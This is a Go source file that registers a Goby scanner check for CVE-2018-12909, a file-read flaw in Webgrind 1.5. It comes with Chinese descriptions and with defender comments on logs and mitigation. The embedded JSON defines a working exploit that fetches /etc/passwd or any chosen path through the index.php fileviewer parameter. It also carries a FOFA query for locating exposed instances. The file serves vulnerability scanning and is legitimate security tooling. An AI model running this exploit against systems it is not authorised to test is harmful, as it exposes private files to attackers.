package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
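// init registers the Goby check definition for CVE-2018-12909 with the
// package-level ExpManager. The vulnerability, as described in the embedded
// Description field, is that Webgrind 1.5 displays whatever file the "file"
// parameter of index.php?op=fileviewer names, so any file readable by the
// web server user can be viewed.
//
// The whole definition is the JSON document in expJSON; the two trailing
// arguments to NewExploit are nil (presumably optional Go callbacks, in which
// case the scanner works from the declarative steps alone; confirm against
// NewExploit).
//
// What the JSON declares:
//   - ScanSteps: one GET for /etc/passwd through the file viewer, following
//     redirects. A finding requires HTTP 200 and a body matching
//     `root:[x*]?:0:0:`. The probe is therefore specific to Unix-like hosts
//     where the web server user can read /etc/passwd; a miss does not show
//     that an instance is fixed.
//   - ExploitSteps: the same request with the file taken from the "path"
//     parameter (default /etc/passwd). Its response test is the same passwd
//     pattern as the scan step, and "output|lastbody||" appears to surface the
//     response body as the step output (confirm against the step runner).
//
// Notes for defenders: in web server access logs the probe shows up as a
// request to index.php with op=fileviewer and a file value outside the
// profiled application's own sources. The Recommendation field states that no
// vendor fix was available when the entry was written; check the referenced
// upstream issue for the current status, and limit who can reach the Webgrind
// instance, since it is a profiling front end.
//
// NOTE(review): DisclosureDate is 2022-06-24 although the CVE identifier is
// from 2018; this looks like the date the entry was authored. Confirm before
// relying on it.
// NOTE(review): Product, Author, CVSSScore and every field of the EN
// translation are empty, so English-language reports built from this entry
// will carry only the name.
func init() {
	// CVEIDs holds the bare identifier with no surrounding whitespace, so
	// exact-match lookups and correlation by CVE ID find this entry.
	expJSON := `{
"Name": "Webgrind_File_read_cve-2018-12909",
"Description": "<p>Webgrind是一套PHP执行时间分析工具。</p><p>Webgrind 1.5版本中存在安全漏洞,该漏洞源于程序依靠用户输入来显示文件。攻击者可借助index.php?op=fileviewer&file= URI利用该漏洞查看可被Webserver用户访问的本地文件系统上的文件。</p>",
"Product": "",
"Homepage": "https://github.com/jokkedk/webgrind",
"DisclosureDate": "2022-06-24",
"Author": "",
"FofaQuery": "app=\"Webgrind\"",
"GobyQuery": "app=\"Webgrind\"",
"Level": "2",
"Impact": "<p>Webgrind是一套PHP执行时间分析工具。</p><p>Webgrind 1.5版本中存在安全漏洞,该漏洞源于程序依靠用户输入来显示文件。攻击者可借助index.php?op=fileviewer&file= URI利用该漏洞查看可被Webserver用户访问的本地文件系统上的文件。</p>",
"Recommendation": "<p>目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:</p><p><a target=\"_Blank\" href=\"https://github.com/jokkedk/webgrind\">https://github.com/jokkedk/webgrind</a></p>",
"References": [
"https://github.com/jokkedk/webgrind/issues/112"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "path",
"type": "input",
"value": "/etc/passwd",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/index.php?op=fileviewer&file=/etc/passwd",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "regex",
"value": "root:[x*]?:0:0:",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/index.php?op=fileviewer&file={{{path}}}",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "regex",
"value": "root:[x*]?:0:0:",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"Tags": [
"任意⽂件下载"
],
"VulType": [
"任意⽂件下载"
],
"CVEIDs": [
"CVE-2018-12909"
],
"CNNVD": [
"CNNVD-201806-1367"
],
"CNVD": [
""
],
"CVSSScore": "",
"Translation": {
"CN": {
"Name": "Webgrind_File_read_cve-2018-12909",
"Product": "",
"Description": "<p>Webgrind是一套PHP执行时间分析工具。</p><p>Webgrind 1.5版本中存在安全漏洞,该漏洞源于程序依靠用户输入来显示文件。攻击者可借助index.php?op=fileviewer&file= URI利用该漏洞查看可被Webserver用户访问的本地文件系统上的文件。</p>",
"Recommendation": "<p>目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:</p><p><a target=\"_Blank\" href=\"https://github.com/jokkedk/webgrind\">https://github.com/jokkedk/webgrind</a></p>",
"Impact": "<p>Webgrind是一套PHP执行时间分析工具。</p><p>Webgrind 1.5版本中存在安全漏洞,该漏洞源于程序依靠用户输入来显示文件。攻击者可借助index.php?op=fileviewer&file= URI利用该漏洞查看可被Webserver用户访问的本地文件系统上的文件。</p>",
"VulType": [
"任意⽂件下载"
],
"Tags": [
"任意⽂件下载"
]
},
"EN": {
"Name": "Webgrind_File_read_cve-2018-12909",
"Product": "",
"Description": "",
"Recommendation": "",
"Impact": "",
"VulType": [],
"Tags": []
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`

	// The entry is keyed by this source file's name, as returned by
	// goutils.GetFileName.
	ExpManager.AddExploit(NewExploit(
		goutils.GetFileName(),
		expJSON,
		nil,
		nil,
	))
}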